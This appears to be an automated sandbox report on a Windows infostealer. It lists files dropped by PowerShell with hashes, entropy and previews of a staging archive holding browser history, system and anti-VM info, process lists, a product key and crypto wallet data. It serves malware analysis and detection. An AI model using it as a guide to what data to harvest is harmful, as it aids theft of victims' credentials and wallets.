                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):330
                                                                                    Entropy (8bit):3.147554613759385
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:kKvlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:XlMkPlE99SNxAhUeVLVt
                                                                                    MD5:30152873E9F84D6F995424B027238800
                                                                                    SHA1:30C2AD03E90D6A6AF862B2D42F3B1E1C01295110
                                                                                    SHA-256:05AC466A29C399F96EC5DC7436286C1C69629AF9CAD57206227153341DAA6729
                                                                                    SHA-512:1D78DF78C90657D33ED1BFFCB3F9D6CB3524E5AF46BC667EFE2BFBF31F056433835152A7379E7051054AA6BE8C42FB35BCC31A2B24FAF3BF6159896E8A0ACC17
                                                                                    Malicious:false
                                                                                    Preview:p...... ...........=R...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\DotNetZip-f22omwiz.tmp

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):99871
                                                                                    Entropy (8bit):7.975825344536822
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:HNOtsc15aeYGob0oty1qiPjEqayPjTXX1+YSd4:HNOtp/aP0qCEOPjTHku
                                                                                    MD5:A8813FCCEC2DD332FE1F2CB95EE4EDF0
                                                                                    SHA1:283ECCC608B9735DF038BC9C230CD7F25BCA7620
                                                                                    SHA-256:4FC4D319C35FF0500F0C4A1BCBC04A8ED2747EE796361E4090CB304C0D93DC79
                                                                                    SHA-512:D8E0DBC5BA26EC454082B4689E4A8F062A25F5D3330287720A4BB00980E7D65C4BB29D4FCC60AF76327FF2699D1EB3CBC712E69896CA319EC2C5372F05084F75
                                                                                    Malicious:false
                                                                                    Preview:PK...........X..............$.Browsers/.. .........%F.}Q...%F.}Q......}Q...PK...........X..............$.Browsers/Google/.. .........V..}Q...V..}Q......}Q...PK...........X..[.s...q.....$.Browsers/Google/History.txt.. ............}Q......}Q...V..}Q.....j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK...........X..............$.Browsers/Mozilla/.. .........%F.}Q...%F.}Q...%F.}Q...PK...........X..............$.Browsers/Mozilla/Firefox/.. ...........1~Q.....1~Q...%F.}Q...PK...........XQ3..J...i...&.$.Browsers/Mozilla/Firefox/Bookmarks.txt.. ...........1~Q.....1~Q.....~Q...SVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK...........Xc.e.S...^...$

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH.zip (copy)

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:dropped
                                                                                    Size (bytes):99871
                                                                                    Entropy (8bit):7.975825344536822
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:HNOtsc15aeYGob0oty1qiPjEqayPjTXX1+YSd4:HNOtp/aP0qCEOPjTHku
                                                                                    MD5:A8813FCCEC2DD332FE1F2CB95EE4EDF0
                                                                                    SHA1:283ECCC608B9735DF038BC9C230CD7F25BCA7620
                                                                                    SHA-256:4FC4D319C35FF0500F0C4A1BCBC04A8ED2747EE796361E4090CB304C0D93DC79
                                                                                    SHA-512:D8E0DBC5BA26EC454082B4689E4A8F062A25F5D3330287720A4BB00980E7D65C4BB29D4FCC60AF76327FF2699D1EB3CBC712E69896CA319EC2C5372F05084F75
                                                                                    Malicious:false
                                                                                    Preview:PK...........X..............$.Browsers/.. .........%F.}Q...%F.}Q......}Q...PK...........X..............$.Browsers/Google/.. .........V..}Q...V..}Q......}Q...PK...........X..[.s...q.....$.Browsers/Google/History.txt.. ............}Q......}Q...V..}Q.....j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK...........X..............$.Browsers/Mozilla/.. .........%F.}Q...%F.}Q...%F.}Q...PK...........X..............$.Browsers/Mozilla/Firefox/.. ...........1~Q.....1~Q...%F.}Q...PK...........XQ3..J...i...&.$.Browsers/Mozilla/Firefox/Bookmarks.txt.. ...........1~Q.....1~Q.....~Q...SVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK...........Xc.e.S...^...$

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Browsers\Google\History.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1393
                                                                                    Entropy (8bit):5.241470443395582
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
                                                                                    MD5:7F24357FFA354F2471DED45552B897D7
                                                                                    SHA1:1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
                                                                                    SHA-256:573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
                                                                                    SHA-512:202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
                                                                                    Malicious:false
                                                                                    Preview:### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Browsers\Mozilla\Firefox\Bookmarks.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):105
                                                                                    Entropy (8bit):3.8863455911790052
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                                    MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                                    SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                                    SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                                    SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                                    Malicious:false
                                                                                    Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Browsers\Mozilla\Firefox\History.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 text
                                                                                    Category:dropped
                                                                                    Size (bytes):94
                                                                                    Entropy (8bit):4.886397362842801
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                                    MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                                    SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                                    SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                                    SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                                    Malicious:false
                                                                                    Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Directories\OneDrive.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.023465189601646
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:1hiR8LKB:14R8LKB
                                                                                    MD5:966247EB3EE749E21597D73C4176BD52
                                                                                    SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                                    SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                                    SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                                    Malicious:false
                                                                                    Preview:OneDrive\...desktop.ini..

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Directories\Startup.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):24
                                                                                    Entropy (8bit):4.053508854797679
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:jgBLKB:j4LKB
                                                                                    MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                                    SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                                    SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                                    SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                                    Malicious:false
                                                                                    Preview:Startup\...desktop.ini..

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\Desktop.jpg

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                    Category:dropped
                                                                                    Size (bytes):97264
                                                                                    Entropy (8bit):7.877908365838417
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:CTKDKXLJT9+UwMTjuY1Zy6oS96oYkyOjhXe+2cYkiYNvpYJwseDePwP0wNWydow:uPbJT9OWqY1Zy6oAWOjhccF1pYEDiwFZ
                                                                                    MD5:16F5D7506FC21AEA39F9700E9AF1E56D
                                                                                    SHA1:DD46191285C4D05FDA5BAB4584BA99EB72C00C06
                                                                                    SHA-256:11DBCDABC9A31F10C13BA718155EB05AE55A1CBAF5343ACD400D5C607C31304D
                                                                                    SHA-512:3F60C945129F586993854DAB9FD855DDB528B08123891B2479D95064077501A286488821F71BFF0809CA073479B5CCA879EDEFF42DC14131FDB8E00A56291E1A
                                                                                    Malicious:false
                                                                                    Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(....~....[.....).....+.F"8x{I.t.p....pj.g.Ez..+..........O.Wz.......\..4;?...O.........QA..Z.DqCr.Y...L....V..\A.

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\Info.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):485
                                                                                    Entropy (8bit):5.423169648425045
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:RYAUt/5HUtL558mXRNhVRJvcbUveLluDTXF4BjA9Yuhn+u+RIP+lrxO+HxGm2E+2:RF6HwPRbVkb21O2YCPhzJxWW/v5Xyl
                                                                                    MD5:58604B0B64205E0389163B48E577A46D
                                                                                    SHA1:19CEEFBC5B7415FDBB2D665EC6995DBBBB47A585
                                                                                    SHA-256:16F4C7B41598A2CBB0995A16E49ED27670ACC56DF5ED8E59DDAD97448416D405
                                                                                    SHA-512:2FDB44DC4A73CED0244900254FDA8B3FD15454DB09441554362E89FDE4E5603D3289B40902DA85B19FC4421E8EA26DB73A51F5CE7A74039ACF06110332887155
                                                                                    Malicious:false
                                                                                    Preview:.[IP].External IP: 185.152.66.230.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 473627.System: Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: VDHOMKWH.RAM: 4095MB.DATE: 2024-04-25 10:51:24 pm.SCREEN: 1280x1024.WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Debugger: False.Processe: False.Hosting: True.Antivirus: Windows Defender..

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\Process.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):20102
                                                                                    Entropy (8bit):5.680354194868963
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:yteKeveNett+hse4VUZiLuexBTGe6e+Y1vLUWeV0gRFfR39hmJe2xaeJLy7Wrl+d:L1mmPAnmFT9Af4+Zz
                                                                                    MD5:25E41812F28A0E3439FAE8B334EB5F40
                                                                                    SHA1:AAF5EB3F9C97D4D5ED3CB8832CC020E01571B381
                                                                                    SHA-256:D72B2A6285C2104CE5C014BC1212C5588B2BFE425C78812E3172AE958CE22F31
                                                                                    SHA-512:C849F541140B2B164293027F9EEFDFEB5A1AFB8DCBD57F8356965F6BA5732A2AA0CF33ACBF1FD70071A0C9F263285D65664C5DEFAAE747AB6D63A47BEEB416F3
                                                                                    Malicious:false
                                                                                    Preview:NAME: svchost ..PID: 2152 ..EXE: C:\Windows\system32\svchost.exe..NAME: explorer ..PID: 2580 ..EXE: C:\Windows\Explorer.EXE..NAME: VdzbVpbgZplZRyqOZeFWtfqAF ..PID: 5628 ..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME: VdzbVpbgZplZRyqOZeFWtfqAF ..PID: 6884 ..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME: VdzbVpbgZplZRyqOZeFWtfqAF ..PID: 3004 ..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME: VdzbVpbgZplZRyqOZeFWtfqAF ..PID: 2140 ..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME: VdzbVpbgZplZRyqOZeFWtfqAF ..PID: 6016 ..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME:

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\ProductKey.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):29
                                                                                    Entropy (8bit):3.9353986674667634
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:LIHDiSAHO5z:8epHOt
                                                                                    MD5:B121A979498A8CF69B20D0CD6C43EA2F
                                                                                    SHA1:8CC7DAAF0B6C057CFF4D1969550E803A01905A4F
                                                                                    SHA-256:7C76B4D56765DAFF1902A666E57D9E7DFD66FD9228794771775286D25E2D5724
                                                                                    SHA-512:8D65CDD4FE72308BA9A4CE658F7742273BFA122C9E846A11D004B5B0570A84F11A42AF27EBE8F2071B00C5B875DDAFC65649CBFC70E33D019A659996C96794BD
                                                                                    Malicious:false
                                                                                    Preview:PJN2H-HPCQG-JFY36-Q38VG-8HB7V

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\System\Windows.txt

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):15225
                                                                                    Entropy (8bit):5.609752180182213
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:5Le2exereLeSeceAe0e+eieBHLqeGeSeVeaejKzHeBeJe3ePe6emePeue1eSeUeg:j
                                                                                    MD5:49EE9F16BCE9FBD4DDF68E4C51C25CED
                                                                                    SHA1:3F2CF4807EDB3924856375FF0B8C9195841F9398
                                                                                    SHA-256:FF121AB2E39744F00C66691069F4C9D4E794F3AECB90A4E945FBEB3842BEA20C
                                                                                    SHA-512:D75B450ED8028CC944EDAE561521576CA163AC933461E886A8016A26E8807944CB6CB35AE541F13DD23B60C3AB1AD0063EDFA62196D053D6AD966CD5463F74B2
                                                                                    Malicious:false
                                                                                    Preview:NAME: VdzbVpbgZplZRyqOZeFWtfqAF..TITLE: New Tab - Google Chrome..PID: 5628..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME: VdzbVpbgZplZRyqOZeFWtfqAF..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME: VdzbVpbgZplZRyqOZeFWtfqAF..TITLE: New Tab - Google Chrome..PID: 3004..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME: VdzbVpbgZplZRyqOZeFWtfqAF..TITLE: New Tab - Google Chrome..PID: 2140..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZplZRyqOZeFWtfqAF.exe..NAME: VdzbVpbgZplZRyqOZeFWtfqAF..TITLE: New Tab - Google Chrome..PID: 6016..EXE: C:\Program Files (x86)\ZYppiRqTClXaLAYntelqLyLlWSMkrfExZuatFRONuKXgITneMtZCnpAZyxxVNFShmpFj\VdzbVpbgZpl

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Wallets\Edge_Wallet\Edge_Exodus\CURRENT

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):16
                                                                                    Entropy (8bit):3.2743974703476995
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                    Malicious:false
                                                                                    Preview:MANIFEST-000001.

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Wallets\Edge_Wallet\Edge_Exodus\LOG

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):363
                                                                                    Entropy (8bit):5.217688464818446
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:k9ihvm81wkn23oH+Tcwt8age8Y55HEZzXELIx2KLlixgq2Pwkn23oH+Tcwt8ages:k9iYbfYeb8rcHEZrEkVLkxgvYfYeb8rX
                                                                                    MD5:5013EA9522041635E5656EC79B7E69E7
                                                                                    SHA1:5FB44B2F624ACEAD0147EFC90D8ACFDFD30AAF60
                                                                                    SHA-256:9605BC1AFB77FEC95C0903FFDE526EFDD31FCEEE7A95F5D3308CEA1B1CFD0A16
                                                                                    SHA-512:6F40CB446420A0A64A5373220D86864D44E691281F61C0DEC05C7A3A3F734119ADFD556DDF2534C003F216897E8D25D9263EC8ECD83810B2A7B1AAE689DC834D
                                                                                    Malicious:false
                                                                                    Preview:2023/10/03-12:48:06.827 4b0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2023/10/03-12:48:06.833 4b0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.

                                                                                    C:\Users\user\AppData\Local\783201baaceef240cc8c33c867306ea7\user@473627_en-CH\Wallets\Edge_Wallet\Edge_Exodus\MANIFEST-000001

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:OpenPGP Secret Key
                                                                                    Category:dropped
                                                                                    Size (bytes):41
                                                                                    Entropy (8bit):4.704993772857998
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                    Malicious:false
                                                                                    Preview:.|.."....leveldb.BytewiseComparator......

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):9713
                                                                                    Entropy (8bit):4.93568648418653
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o
                                                                                    MD5:A7EDDF0DCC37957ABAFE63CE6D0BE4CA
                                                                                    SHA1:5B09680EF1C3C405D698481E1364BE0C412C7A9C
                                                                                    SHA-256:B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327
                                                                                    SHA-512:A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73
                                                                                    Malicious:false
                                                                                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2832
                                                                                    Entropy (8bit):5.414030276061799
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:0AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHYvIIfLz9qrh7KrJ5Eo9Adrxz
                                                                                    MD5:BAF5A10C59FD93E444E5B672D7CCB1D4
                                                                                    SHA1:906BB875AB47D641756F44E09633F75AFDDDD638
                                                                                    SHA-256:B029CB8CEA8D97BF6F636D2BE3F7A0F3334A07E22B832581A3D1D1F282AFC637
                                                                                    SHA-512:B52A2F66B83271814381F897CD32B83ED97F18553EEDB8DDABE99B93EAF58C46A362E6255B0744C41C5E91042238E15ED9E4CF46C11446937B850F104965087A
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5blwldwa.blh.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
